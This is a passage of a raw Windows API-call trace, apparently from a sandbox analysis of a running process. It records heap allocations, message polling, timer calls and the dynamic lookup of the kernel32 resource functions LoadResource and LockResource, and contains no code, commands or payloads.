hHeap=0x12c0000) returned 1 [0122.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0122.772] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0122.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0122.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0122.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0122.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0122.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efaa0 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0122.775] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8e0 [0122.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcb8 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda90 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef980 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0122.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb68 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda90 | out: hHeap=0x12c0000) returned 1 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb68 | out: hHeap=0x12c0000) returned 1 [0122.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0122.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9c0 [0122.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0122.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9e8 [0122.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0122.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9e8 | out: hHeap=0x12c0000) returned 1 [0122.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.777] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0122.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0122.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efab0 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd9d0 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x14bd9d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadResource", lpUsedDefaultChar=0x0) returned 13 [0122.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9d0 | out: hHeap=0x12c0000) returned 1 [0122.779] GetProcAddress (hModule=0x74650000, lpProcName="LoadResource") returned 0x746676f0 [0122.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0122.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff870 [0122.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa00 [0122.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efab0 [0122.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff870 | out: hHeap=0x12c0000) returned 1 [0122.780] LoadResource (hModule=0x0, hResInfo=0xfe76a8) returned 0x1055bac [0122.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0122.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0122.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bdc58 [0122.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbe0 [0122.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcb8 [0122.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb68 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb68 | out: hHeap=0x12c0000) returned 1 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdca0 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda60 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda60 | out: hHeap=0x12c0000) returned 1 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda48 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc88 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0122.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa10 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0122.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0122.822] FreeLibrary (hLibModule=0x74650000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0122.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0122.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.823] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 1 [0122.823] TranslateMessage (lpMsg=0x7df524) returned 0 [0122.823] DispatchMessageW (lpMsg=0x7df524) returned 0x0 [0122.823] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0122.823] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0122.823] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0122.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.824] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0122.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0122.825] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.825] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0122.825] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0122.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0122.825] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.826] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.826] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0122.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0122.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0122.827] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0122.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0122.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0122.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0122.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0122.828] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa70 [0122.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa70 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0122.829] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.829] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.829] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0122.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd928 [0122.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x14bd928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LockResource", lpUsedDefaultChar=0x0) returned 13 [0122.830] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.830] GetProcAddress (hModule=0x74650000, lpProcName="LockResource") returned 0x74667890 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff8e8 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff8e8 | out: hHeap=0x12c0000) returned 1 [0122.831] LockResource (hResData=0x1055bac) returned 0x1055bac [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa90 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef980 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 